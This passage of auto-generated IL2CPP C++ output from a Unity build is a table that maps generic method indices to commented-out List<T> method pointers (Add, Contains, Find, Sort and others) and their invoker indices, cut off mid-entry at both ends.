2922/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Add_m1206679309_gshared*/, 5/*5*/}, { 3672, 2923/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Contains_m2038943033_gshared*/, 1/*1*/}, { 3673, 2924/*(Il2CppMethodPointer)&List_1_System_Collections_IList_IndexOf_m2363278771_gshared*/, 5/*5*/}, { 3674, 2925/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Insert_m2838947798_gshared*/, 187/*187*/}, { 3675, 2926/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Remove_m3933652540_gshared*/, 90/*90*/}, { 3676, 2927/*(Il2CppMethodPointer)&List_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m1380246012_gshared*/, 43/*43*/}, { 3677, 2928/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_get_IsSynchronized_m3709489469_gshared*/, 43/*43*/}, { 3678, 2929/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_get_SyncRoot_m181847497_gshared*/, 4/*4*/}, { 3679, 2930/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_IsFixedSize_m95206982_gshared*/, 43/*43*/}, { 3680, 2931/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_IsReadOnly_m935733081_gshared*/, 43/*43*/}, { 3681, 2932/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_Item_m3989815218_gshared*/, 97/*97*/}, { 3682, 2933/*(Il2CppMethodPointer)&List_1_System_Collections_IList_set_Item_m3243836587_gshared*/, 187/*187*/}, { 3683, 2934/*(Il2CppMethodPointer)&List_1_GrowIfNeeded_m823678457_gshared*/, 42/*42*/}, { 3684, 2935/*(Il2CppMethodPointer)&List_1_AddCollection_m3266731889_gshared*/, 90/*90*/}, { 3685, 2936/*(Il2CppMethodPointer)&List_1_AddEnumerable_m1326553217_gshared*/, 90/*90*/}, { 3686, 2937/*(Il2CppMethodPointer)&List_1_AsReadOnly_m2125199073_gshared*/, 4/*4*/}, { 3687, 2938/*(Il2CppMethodPointer)&List_1_Contains_m3819542652_gshared*/, 1282/*1282*/}, { 3688, 2939/*(Il2CppMethodPointer)&List_1_CopyTo_m3599989706_gshared*/, 86/*86*/}, { 3689, 2940/*(Il2CppMethodPointer)&List_1_Find_m3480386930_gshared*/, 1595/*1595*/}, { 3690, 2941/*(Il2CppMethodPointer)&List_1_CheckMatch_m272080553_gshared*/, 90/*90*/}, { 3691, 2942/*(Il2CppMethodPointer)&List_1_GetIndex_m4149823362_gshared*/, 1201/*1201*/}, { 3692, 2943/*(Il2CppMethodPointer)&List_1_GetEnumerator_m2718304481_gshared*/, 1596/*1596*/}, { 3693, 2944/*(Il2CppMethodPointer)&List_1_IndexOf_m2418862432_gshared*/, 1346/*1346*/}, { 3694, 2945/*(Il2CppMethodPointer)&List_1_Shift_m3230294253_gshared*/, 210/*210*/}, { 3695, 2946/*(Il2CppMethodPointer)&List_1_CheckIndex_m1913591742_gshared*/, 42/*42*/}, { 3696, 2947/*(Il2CppMethodPointer)&List_1_Insert_m2375507299_gshared*/, 1253/*1253*/}, { 3697, 2948/*(Il2CppMethodPointer)&List_1_CheckCollection_m1228076404_gshared*/, 90/*90*/}, { 3698, 2949/*(Il2CppMethodPointer)&List_1_Remove_m3979520415_gshared*/, 1282/*1282*/}, { 3699, 2950/*(Il2CppMethodPointer)&List_1_RemoveAll_m3473142549_gshared*/, 5/*5*/}, { 3700, 2951/*(Il2CppMethodPointer)&List_1_RemoveAt_m1662147959_gshared*/, 42/*42*/}, { 3701, 2952/*(Il2CppMethodPointer)&List_1_Reverse_m283673877_gshared*/, 0/*0*/}, { 3702, 2953/*(Il2CppMethodPointer)&List_1_Sort_m116241367_gshared*/, 0/*0*/}, { 3703, 2954/*(Il2CppMethodPointer)&List_1_Sort_m1945508006_gshared*/, 90/*90*/}, { 3704, 2955/*(Il2CppMethodPointer)&List_1_ToArray_m3752387798_gshared*/, 4/*4*/}, { 3705, 2956/*(Il2CppMethodPointer)&List_1_TrimExcess_m7557008_gshared*/, 0/*0*/}, { 3706, 2957/*(Il2CppMethodPointer)&List_1_get_Capacity_m1878556466_gshared*/, 3/*3*/}, { 3707, 2958/*(Il2CppMethodPointer)&List_1_set_Capacity_m197289457_gshared*/, 42/*42*/}, { 3708, 2959/*(Il2CppMethodPointer)&List_1_get_Count_m1752597149_gshared*/, 3/*3*/}, { 3709, 2960/*(Il2CppMethodPointer)&List_1__ctor_m247608098_gshared*/, 42/*42*/}, { 3710, 2961/*(Il2CppMethodPointer)&List_1__cctor_m911493842_gshared*/, 0/*0*/}, { 3711, 2962/*(Il2CppMethodPointer)&List_1_System_Collections_Generic_IEnumerableU3CTU3E_GetEnumerator_m4001960207_gshared*/, 4/*4*/}, { 3712, 2963/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_CopyTo_m1172585019_gshared*/, 86/*86*/}, { 3713, 2964/*(Il2CppMethodPointer)&List_1_System_Collections_IEnumerable_GetEnumerator_m3458565060_gshared*/, 4/*4*/}, { 3714, 2965/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Add_m3128129043_gshared*/, 5/*5*/}, { 3715, 2966/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Contains_m4193366963_gshared*/, 1/*1*/}, { 3716, 2967/*(Il2CppMethodPointer)&List_1_System_Collections_IList_IndexOf_m4061554721_gshared*/, 5/*5*/}, { 3717, 2968/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Insert_m848656350_gshared*/, 187/*187*/}, { 3718, 2969/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Remove_m875577424_gshared*/, 90/*90*/}, { 3719, 2970/*(Il2CppMethodPointer)&List_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m1084563456_gshared*/, 43/*43*/}, { 3720, 2971/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_get_IsSynchronized_m1411620731_gshared*/, 43/*43*/}, { 3721, 2972/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_get_SyncRoot_m3031553207_gshared*/, 4/*4*/}, { 3722, 2973/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_IsFixedSize_m568608666_gshared*/, 43/*43*/}, { 3723, 2974/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_IsReadOnly_m3308105823_gshared*/, 43/*43*/}, { 3724, 2975/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_Item_m4133696900_gshared*/, 97/*97*/}, { 3725, 2976/*(Il2CppMethodPointer)&List_1_System_Collections_IList_set_Item_m2267202349_gshared*/, 187/*187*/}, { 3726, 2977/*(Il2CppMethodPointer)&List_1_GrowIfNeeded_m3640023655_gshared*/, 42/*42*/}, { 3727, 2978/*(Il2CppMethodPointer)&List_1_AddCollection_m1183688727_gshared*/, 90/*90*/}, { 3728, 2979/*(Il2CppMethodPointer)&List_1_AddEnumerable_m2981292375_gshared*/, 90/*90*/}, { 3729, 2980/*(Il2CppMethodPointer)&List_1_AddRange_m1797294292_gshared*/, 90/*90*/}, { 3730, 2981/*(Il2CppMethodPointer)&List_1_AsReadOnly_m2629234039_gshared*/, 4/*4*/}, { 3731, 2982/*(Il2CppMethodPointer)&List_1_Contains_m216578708_gshared*/, 1284/*1284*/}, { 3732, 2983/*(Il2CppMethodPointer)&List_1_CopyTo_m4240677846_gshared*/, 86/*86*/}, { 3733, 2984/*(Il2CppMethodPointer)&List_1_Find_m2584113984_gshared*/, 1065/*1065*/}, { 3734, 2985/*(Il2CppMethodPointer)&List_1_CheckMatch_m1650813139_gshared*/, 90/*90*/}, { 3735, 2986/*(Il2CppMethodPointer)&List_1_GetIndex_m4044233846_gshared*/, 1201/*1201*/}, { 3736, 2987/*(Il2CppMethodPointer)&List_1_GetEnumerator_m2672519407_gshared*/, 1597/*1597*/}, { 3737, 2988/*(Il2CppMethodPointer)&List_1_IndexOf_m2443621264_gshared*/, 1348/*1348*/}, { 3738, 2989/*(Il2CppMethodPointer)&List_1_Shift_m3614644831_gshared*/, 210/*210*/}, { 3739, 2990/*(Il2CppMethodPointer)&List_1_CheckIndex_m2576265846_gshared*/, 42/*42*/}, { 3740, 2991/*(Il2CppMethodPointer)&List_1_Insert_m2532850849_gshared*/, 1430/*1430*/}, { 3741, 2992/*(Il2CppMethodPointer)&List_1_CheckCollection_m3234052816_gshared*/, 90/*90*/}, { 3742, 2993/*(Il2CppMethodPointer)&List_1_Remove_m490375377_gshared*/, 1284/*1284*/}, { 3743, 2994/*(Il2CppMethodPointer)&List_1_RemoveAll_m4125997475_gshared*/, 5/*5*/}, { 3744, 2995/*(Il2CppMethodPointer)&List_1_RemoveAt_m3262734405_gshared*/, 42/*42*/}, { 3745, 2996/*(Il2CppMethodPointer)&List_1_Reverse_m302978607_gshared*/, 0/*0*/}, { 3746, 2997/*(Il2CppMethodPointer)&List_1_Sort_m2928552217_gshared*/, 0/*0*/}, { 3747, 2998/*(Il2CppMethodPointer)&List_1_ToArray_m3596746708_gshared*/, 4/*4*/}, { 3748, 2999/*(Il2CppMethodPointer)&List_1_TrimExcess_m433740308_gshared*/, 0/*0*/}, { 3749, 3000/*(Il2CppMethodPointer)&List_1_get_Capacity_m4262042666_gshared*/, 3/*3*/}, { 3750, 3001/*(Il2CppMethodPointer)&List_1_set_Capacity_m1328294231_gshared*/, 42/*42*/}, { 3751, 3002/*(Il2CppMethodPointer)&List_1_set_Item_m2039806228_gshared*/, 1430/*1430*/}, { 3752, 3003/*(Il2CppMethodPointer)&List_1__ctor_m1375473095_gshared*/, 0/*0*/}, { 3753, 3004/*(Il2CppMethodPointer)&List_1__cctor_m3823644086_gshared*/, 0/*0*/}, { 3754, 3005/*(Il2CppMethodPointer)&List_1_System_Collections_Generic_IEnumerableU3CTU3E_GetEnumerator_m2348591407_gshared*/, 4/*4*/}, { 3755, 3006/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_CopyTo_m2073695915_gshared*/, 86/*86*/}, { 3756, 3007/*(Il2CppMethodPointer)&List_1_System_Collections_IEnumerable_GetEnumerator_m794986580_gshared*/, 4/*4*/}, { 3757, 3008/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Add_m4141282763_gshared*/, 5/*5*/}, { 3758, 3009/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Contains_m628054451_gshared*/, 1/*1*/}, { 3759, 3010/*(Il2CppMethodPointer)&List_1_System_Collections_IList_IndexOf_m2887559165_gshared*/, 5/*5*/}, { 3760, 3011/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Insert_m3714295934_gshared*/, 187/*187*/}, { 3761, 3012/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Remove_m3673342024_gshared*/, 90/*90*/}, { 3762, 3013/*(Il2CppMethodPointer)&List_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m4057491736_gshared*/, 43/*43*/}, { 3763, 3014/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_get_IsSynchronized_m2070580979_gshared*/, 43/*43*/}, { 3764, 3015/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_get_SyncRoot_m22440695_gshared*/, 4/*4*/}, { 3765, 3016/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_IsFixedSize_m1195644338_gshared*/, 43/*43*/}, { 3766, 3017/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_IsReadOnly_m926493967_gshared*/, 43/*43*/}, { 3767, 3018/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_Item_m3646798836_gshared*/, 97/*97*/}, { 3768, 3019/*(Il2CppMethodPointer)&List_1_System_Collections_IList_set_Item_m1129584681_gshared*/, 187/*187*/}, { 3769, 3020/*(Il2CppMethodPointer)&List_1_Add_m3910722802_gshared*/, 1394/*1394*/}, { 3770, 3021/*(Il2CppMethodPointer)&List_1_GrowIfNeeded_m1073407447_gshared*/, 42/*42*/}, { 3771, 3022/*(Il2CppMethodPointer)&List_1_AddCollection_m2221063383_gshared*/, 90/*90*/}, { 3772, 3023/*(Il2CppMethodPointer)&List_1_AddEnumerable_m2203160679_gshared*/, 90/*90*/}, { 3773, 3024/*(Il2CppMethodPointer)&List_1_AddRange_m1106917444_gshared*/, 90/*90*/}, { 3774, 3025/*(Il2CppMethodPointer)&List_1_AsReadOnly_m2401222295_gshared*/, 4/*4*/}, { 3775, 3026/*(Il2CppMethodPointer)&List_1_Clear_m3088166542_gshared*/, 0/*0*/}, { 3776, 3027/*(Il2CppMethodPointer)&List_1_Contains_m1838557784_gshared*/, 1291/*1291*/}, { 3777, 3028/*(Il2CppMethodPointer)&List_1_CopyTo_m612443030_gshared*/, 86/*86*/}, { 3778, 3029/*(Il2CppMethodPointer)&List_1_Find_m970100220_gshared*/, 1598/*1598*/}, { 3779, 3030/*(Il2CppMethodPointer)&List_1_CheckMatch_m2830747427_gshared*/, 90/*90*/}, { 3780, 3031/*(Il2CppMethodPointer)&List_1_GetIndex_m1530979506_gshared*/, 1201/*1201*/}, { 3781, 3032/*(Il2CppMethodPointer)&List_1_GetEnumerator_m3769099511_gshared*/, 1599/*1599*/}, { 3782, 3033/*(Il2CppMethodPointer)&List_1_IndexOf_m4082601464_gshared*/, 1356/*1356*/}, { 3783, 3034/*(Il2CppMethodPointer)&List_1_Shift_m1437179143_gshared*/, 210/*210*/}, { 3784, 3035/*(Il2CppMethodPointer)&List_1_CheckIndex_m4231572822_gshared*/, 42/*42*/}, { 3785, 3036/*(Il2CppMethodPointer)&List_1_Insert_m3305828613_gshared*/, 1437/*1437*/}, { 3786, 3037/*(Il2CppMethodPointer)&List_1_CheckCollection_m4110679452_gshared*/, 90/*90*/}, { 3787, 3038/*(Il2CppMethodPointer)&List_1_Remove_m2664188309_gshared*/, 1291/*1291*/}, { 3788, 3039/*(Il2CppMethodPointer)&List_1_RemoveAll_m186019563_gshared*/, 5/*5*/}, { 3789, 3040/*(Il2CppMethodPointer)&List_1_RemoveAt_m1940208129_gshared*/, 42/*42*/}, { 3790, 3041/*(Il2CppMethodPointer)&List_1_Reverse_m28825263_gshared*/, 0/*0*/}, { 3791, 3042/*(Il2CppMethodPointer)&List_1_Sort_m4156683373_gshared*/, 0/*0*/}, { 3792, 3043/*(Il2CppMethodPointer)&List_1_Sort_m1776255358_gshared*/, 90/*90*/}, { 3793, 3044/*(Il2CppMethodPointer)&List_1_ToArray_m3533455832_gshared*/, 4/*4*/}, { 3794, 3045/*(Il2CppMethodPointer)&List_1_TrimExcess_m2004514756_gshared*/, 0/*0*/}, { 3795, 3046/*(Il2CppMethodPointer)&List_1_get_Capacity_m2486809294_gshared*/, 3/*3*/}, { 3796, 3047/*(Il2CppMethodPointer)&List_1_set_Capacity_m2969391799_gshared*/, 42/*42*/}, { 3797, 3048/*(Il2CppMethodPointer)&List_1_get_Count_m845638235_gshared*/, 3/*3*/}, { 3798, 3049/*(Il2CppMethodPointer)&List_1_get_Item_m2197879061_gshared*/, 1500/*1500*/}, { 3799, 3050/*(Il2CppMethodPointer)&List_1_set_Item_m3658560340_gshared*/, 1437/*1437*/}, { 3800, 3051/*(Il2CppMethodPointer)&List_1__ctor_m2164983161_gshared*/, 0/*0*/}, { 3801, 3052/*(Il2CppMethodPointer)&List_1__cctor_m1337542316_gshared*/, 0/*0*/}, { 3802, 3053/*(Il2CppMethodPointer)&List_1_System_Collections_Generic_IEnumerableU3CTU3E_GetEnumerator_m1243254425_gshared*/, 4/*4*/}, { 3803, 3054/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_CopyTo_m1995866425_gshared*/, 86/*86*/}, { 3804, 3055/*(Il2CppMethodPointer)&List_1_System_Collections_IEnumerable_GetEnumerator_m1891857818_gshared*/, 4/*4*/}, { 3805, 3056/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Add_m4271264217_gshared*/, 5/*5*/}, { 3806, 3057/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Contains_m1464819673_gshared*/, 1/*1*/}, { 3807, 3058/*(Il2CppMethodPointer)&List_1_System_Collections_IList_IndexOf_m3828407883_gshared*/, 5/*5*/}, { 3808, 3059/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Insert_m2036969360_gshared*/, 187/*187*/}, { 3809, 3060/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Remove_m3749270066_gshared*/, 90/*90*/}, { 3810, 3061/*(Il2CppMethodPointer)&List_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m567458162_gshared*/, 43/*43*/}, { 3811, 3062/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_get_IsSynchronized_m2655927277_gshared*/, 43/*43*/}, { 3812, 3063/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_get_SyncRoot_m1836255877_gshared*/, 4/*4*/}, { 3813, 3064/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_IsFixedSize_m3522184224_gshared*/, 43/*43*/}, { 3814, 3065/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_IsReadOnly_m2397971721_gshared*/, 43/*43*/}, { 3815, 3066/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_Item_m603528194_gshared*/, 97/*97*/}, { 3816, 3067/*(Il2CppMethodPointer)&List_1_System_Collections_IList_set_Item_m1017084179_gshared*/, 187/*187*/}, { 3817, 3068/*(Il2CppMethodPointer)&List_1_Add_m1379180100_gshared*/, 1395/*1395*/}, { 3818, 3069/*(Il2CppMethodPointer)&List_1_GrowIfNeeded_m2433342921_gshared*/, 42/*42*/}, { 3819, 3070/*(Il2CppMethodPointer)&List_1_AddCollection_m3284813601_gshared*/, 90/*90*/}, { 3820, 3071/*(Il2CppMethodPointer)&List_1_AddEnumerable_m1321110033_gshared*/, 90/*90*/}, { 3821, 3072/*(Il2CppMethodPointer)&List_1_AddRange_m884869306_gshared*/, 90/*90*/}, { 3822, 3073/*(Il2CppMethodPointer)&List_1_AsReadOnly_m1096672201_gshared*/, 4/*4*/}, { 3823, 3074/*(Il2CppMethodPointer)&List_1_Clear_m3871149208_gshared*/, 0/*0*/}, { 3824, 3075/*(Il2CppMethodPointer)&List_1_Contains_m4086580990_gshared*/, 1292/*1292*/}, { 3825, 3076/*(Il2CppMethodPointer)&List_1_CopyTo_m352105188_gshared*/, 86/*86*/}, { 3826, 3077/*(Il2CppMethodPointer)&List_1_Find_m3680710386_gshared*/, 1600/*1600*/}, { 3827, 3078/*(Il2CppMethodPointer)&List_1_CheckMatch_m2013763705_gshared*/, 90/*90*/}, { 3828, 3079/*(Il2CppMethodPointer)&List_1_GetIndex_m821865344_gshared*/, 1201/*1201*/}, { 3829, 3080/*(Il2CppMethodPointer)&List_1_GetEnumerator_m4053501645_gshared*/, 1601/*1601*/}, { 3830, 3081/*(Il2CppMethodPointer)&List_1_IndexOf_m3051639274_gshared*/, 1357/*1357*/}, { 3831, 3082/*(Il2CppMethodPointer)&List_1_Shift_m439051997_gshared*/, 210/*210*/}, { 3832, 3083/*(Il2CppMethodPointer)&List_1_CheckIndex_m2850737480_gshared*/, 42/*42*/}, { 3833, 3084/*(Il2CppMethodPointer)&List_1_Insert_m1936082907_gshared*/, 1438/*1438*/}, { 3834, 3085/*(Il2CppMethodPointer)&List_1_CheckCollection_m746720422_gshared*/, 90/*90*/}, { 3835, 3086/*(Il2CppMethodPointer)&List_1_Remove_m2981732583_gshared*/, 1292/*1292*/}, { 3836, 3087/*(Il2CppMethodPointer)&List_1_RemoveAll_m319434801_gshared*/, 5/*5*/}, { 3837, 3088/*(Il2CppMethodPointer)&List_1_RemoveAt_m3966616367_gshared*/, 42/*42*/}, { 3838, 3089/*(Il2CppMethodPointer)&List_1_Reverse_m3030138629_gshared*/, 0/*0*/}, { 3839, 3090/*(Il2CppMethodPointer)&List_1_Sort_m1625178975_gshared*/, 0/*0*/}, { 3840, 3091/*(Il2CppMethodPointer)&List_1_Sort_m2659614836_gshared*/, 90/*90*/}, { 3841, 3092/*(Il2CppMethodPointer)&List_1_ToArray_m2390522926_gshared*/, 4/*4*/}, { 3842, 3093/*(Il2CppMethodPointer)&List_1_TrimExcess_m2896397750_gshared*/, 0/*0*/}, { 3843, 3094/*(Il2CppMethodPointer)&List_1_get_Capacity_m2038446304_gshared*/, 3/*3*/}, { 3844, 3095/*(Il2CppMethodPointer)&List_1_set_Capacity_m859503073_gshared*/, 42/*42*/}, { 3845, 3096/*(Il2CppMethodPointer)&List_1_get_Count_m1736231209_gshared*/, 3/*3*/}, { 3846, 3097/*(Il2CppMethodPointer)&List_1_get_Item_m3831223555_gshared*/, 1501/*1501*/}, { 3847, 3098/*(Il2CppMethodPointer)&List_1_set_Item_m125761062_gshared*/, 1438/*1438*/}, { 3848, 3099/*(Il2CppMethodPointer)&List_1__ctor_m1337392449_gshared*/, 0/*0*/}, { 3849, 3100/*(Il2CppMethodPointer)&List_1__cctor_m476277764_gshared*/, 0/*0*/}, { 3850, 3101/*(Il2CppMethodPointer)&List_1_System_Collections_Generic_IEnumerableU3CTU3E_GetEnumerator_m166627113_gshared*/, 4/*4*/}, { 3851, 3102/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_CopyTo_m3316219081_gshared*/, 86/*86*/}, { 3852, 3103/*(Il2CppMethodPointer)&List_1_System_Collections_IEnumerable_GetEnumerator_m454293978_gshared*/, 4/*4*/}, { 3853, 3104/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Add_m3674406113_gshared*/, 5/*5*/}, { 3854, 3105/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Contains_m2481604681_gshared*/, 1/*1*/}, { 3855, 3106/*(Il2CppMethodPointer)&List_1_System_Collections_IList_IndexOf_m2897263627_gshared*/, 5/*5*/}, { 3856, 3107/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Insert_m3635932016_gshared*/, 187/*187*/}, { 3857, 3108/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Remove_m1821277226_gshared*/, 90/*90*/}, { 3858, 3109/*(Il2CppMethodPointer)&List_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m3787929546_gshared*/, 43/*43*/}, { 3859, 3110/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_get_IsSynchronized_m2270713861_gshared*/, 43/*43*/}, { 3860, 3111/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_get_SyncRoot_m3515852805_gshared*/, 4/*4*/}, { 3861, 3112/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_IsFixedSize_m999831848_gshared*/, 43/*43*/}, { 3862, 3113/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_IsReadOnly_m60655113_gshared*/, 43/*43*/}, { 3863, 3114/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_Item_m2570285042_gshared*/, 97/*97*/}, { 3864, 3115/*(Il2CppMethodPointer)&List_1_System_Collections_IList_set_Item_m1634052283_gshared*/, 187/*187*/}, { 3865, 3116/*(Il2CppMethodPointer)&List_1_GrowIfNeeded_m2637898233_gshared*/, 42/*42*/}, { 3866, 3117/*(Il2CppMethodPointer)&List_1_AddCollection_m4114156849_gshared*/, 90/*90*/}, { 3867, 3118/*(Il2CppMethodPointer)&List_1_AddEnumerable_m1000825969_gshared*/, 90/*90*/}, { 3868, 3119/*(Il2CppMethodPointer)&List_1_AddRange_m2030106074_gshared*/, 90/*90*/}, { 3869, 3120/*(Il2CppMethodPointer)&List_1_AsReadOnly_m1681105545_gshared*/, 4/*4*/}, { 3870, 3121/*(Il2CppMethodPointer)&List_1_Clear_m2304044904_gshared*/, 0/*0*/}, { 3871, 3122/*(Il2CppMethodPointer)&List_1_Contains_m2638831974_gshared*/, 1293/*1293*/}, { 3872, 3123/*(Il2CppMethodPointer)&List_1_CopyTo_m158925060_gshared*/, 86/*86*/}, { 3873, 3124/*(Il2CppMethodPointer)&List_1_Find_m1270109362_gshared*/, 1602/*1602*/}, { 3874, 3125/*(Il2CppMethodPointer)&List_1_CheckMatch_m419866969_gshared*/, 90/*90*/}, { 3875, 3126/*(Il2CppMethodPointer)&List_1_GetIndex_m3262928832_gshared*/, 1201/*1201*/}, { 3876, 3127/*(Il2CppMethodPointer)&List_1_GetEnumerator_m3621075925_gshared*/, 1603/*1603*/}, { 3877, 3128/*(Il2CppMethodPointer)&List_1_IndexOf_m2722594082_gshared*/, 1358/*1358*/}, { 3878, 3129/*(Il2CppMethodPointer)&List_1_Shift_m2647431653_gshared*/, 210/*210*/}, { 3879, 3130/*(Il2CppMethodPointer)&List_1_CheckIndex_m1331979688_gshared*/, 42/*42*/}, { 3880, 3131/*(Il2CppMethodPointer)&List_1_Insert_m244730035_gshared*/, 1248/*1248*/}, { 3881, 3132/*(Il2CppMethodPointer)&List_1_CheckCollection_m1603829150_gshared*/, 90/*90*/}, { 3882, 3133/*(Il2CppMethodPointer)&List_1_Remove_m35225255_gshared*/, 1293/*1293*/}, { 3883, 3134/*(Il2CppMethodPointer)&List_1_RemoveAll_m4269479257_gshared*/, 5/*5*/}, { 3884, 3135/*(Il2CppMethodPointer)&List_1_RemoveAt_m1843849279_gshared*/, 42/*42*/}, { 3885, 3136/*(Il2CppMethodPointer)&List_1_Reverse_m3395936565_gshared*/, 0/*0*/}, { 3886, 3137/*(Il2CppMethodPointer)&List_1_Sort_m162281215_gshared*/, 0/*0*/}, { 3887, 3138/*(Il2CppMethodPointer)&List_1_Sort_m1781332044_gshared*/, 90/*90*/}, { 3888, 3139/*(Il2CppMethodPointer)&List_1_ToArray_m1915350374_gshared*/, 4/*4*/}, { 3889, 3140/*(Il2CppMethodPointer)&List_1_TrimExcess_m2917822182_gshared*/, 0/*0*/}, { 3890, 3141/*(Il2CppMethodPointer)&List_1__ctor_m3511181530_gshared*/, 0/*0*/}, { 3891, 3142/*(Il2CppMethodPointer)&List_1__ctor_m4213097859_gshared*/, 42/*42*/}, { 3892, 3143/*(Il2CppMethodPointer)&List_1__cctor_m258195429_gshared*/, 0/*0*/}, { 3893, 3144/*(Il2CppMethodPointer)&List_1_System_Collections_Generic_IEnumerableU3CTU3E_GetEnumerator_m3625278020_gshared*/, 4/*4*/}, { 3894, 3145/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_CopyTo_m3846687822_gshared*/, 86/*86*/}, { 3895, 3146/*(Il2CppMethodPointer)&List_1_System_Collections_IEnumerable_GetEnumerator_m1422822879_gshared*/, 4/*4*/}, { 3896, 3147/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Add_m1820917634_gshared*/, 5/*5*/}, { 3897, 3148/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Contains_m780443244_gshared*/, 1/*1*/}, { 3898, 3149/*(Il2CppMethodPointer)&List_1_System_Collections_IList_IndexOf_m3713885384_gshared*/, 5/*5*/}, { 3899, 3150/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Insert_m941505143_gshared*/, 187/*187*/}, { 3900, 3151/*(Il2CppMethodPointer)&List_1_System_Collections_IList_Remove_m3763718607_gshared*/, 90/*90*/}, { 3901, 3152/*(Il2CppMethodPointer)&List_1_System_Collections_Generic_ICollectionU3CTU3E_get_IsReadOnly_m1453178827_gshared*/, 43/*43*/}, { 3902, 3153/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_get_IsSynchronized_m227393674_gshared*/, 43/*43*/}, { 3903, 3154/*(Il2CppMethodPointer)&List_1_System_Collections_ICollection_get_SyncRoot_m1804424478_gshared*/, 4/*4*/}, { 3904, 3155/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_IsFixedSize_m3108597135_gshared*/, 43/*43*/}, { 3905, 3156/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_IsReadOnly_m3666009382_gshared*/, 43/*43*/}, { 3906, 3157/*(Il2CppMethodPointer)&List_1_System_Collections_IList_get_Item_m2378573511_gshared*/, 97/*97*/}, { 3907, 3158/*(Il2CppMethodPointer)&List_1_System_Collections_IList_set_Item_m2480767060_gshared*/, 187/*187*/}, { 3908, 3159/*(Il2CppMethodPointer)&List_1_GrowIfNeeded_m2239402788_gshared*/, 42/*42*/}, { 3909, 3160/*(Il2CppMethodPointer)&List_1_AddCollection_m767358372_gshared*/, 90/*90*/}, { 3910, 3161/*(Il2CppMethodPointer)&List_1_AddEnumerable_m1062096212_gshared*/, 90/*90*/}, { 3911, 3162/*(Il2CppMethodPointer)&List_1_AsReadOnly_m4108578222_gshared*/, 4/*4*/}, { 3912, 3163/*(Il2CppMethodPointer)&List_1_Contains_m2079304621_gshared*/, 915/*915*/}, { 3913, 3164/*(Il2CppMethodPointer)&List_1_CopyTo_m1896864447_gshared*/, 86/*86*/}, { 3914, 3165/*(Il2CppMethodPointer)&List_1_Find_m3862454845_gshared*/, 861/*861*/}, { 3915, 3166/*(Il2CppMethodPointer)&List_1_CheckMatch_m1345998262_gshared*/, 90/*90*/}, { 3916, 3167/*(Il2CppMethodPointer)&List_1_GetIndex_m2728961497_gshared*/, 1201/*1201*/}, { 3917, 3168/*(Il2CppMethodPointer)&List_1_GetEnumerator_m3339340714_gshared*/, 1604/*1604*/}, { 3918, 3169/*(Il2CppMethodPointer)&List_1_IndexOf_m2019441835_gshared*/, 1111/*1111*/}, { 3919, 3170/*(Il2CppMethodPointer)&List_1_Shift_m3083454298_gshared*/, 210/*210*/}, { 3920, 3171/*(Il2CppMethodPointer)&List_1_CheckIndex_m402842271_gshared*/, 42/*42*/}, { 3921, 3172/*(Il2CppMethodPointer)&List_1_Insert_m1176952016_gshared*/, 854/*854*/}, { 3922, 3173/*(Il2CppMethodPointer)&List_1_CheckCollection_m2220107869_gshared*/, 90/*90*/}, { 3923, 3174/*(Il2CppMethodPointer)&List_1_Remove_m1237648310_gshared*/, 915/*915*/}, { 3924, 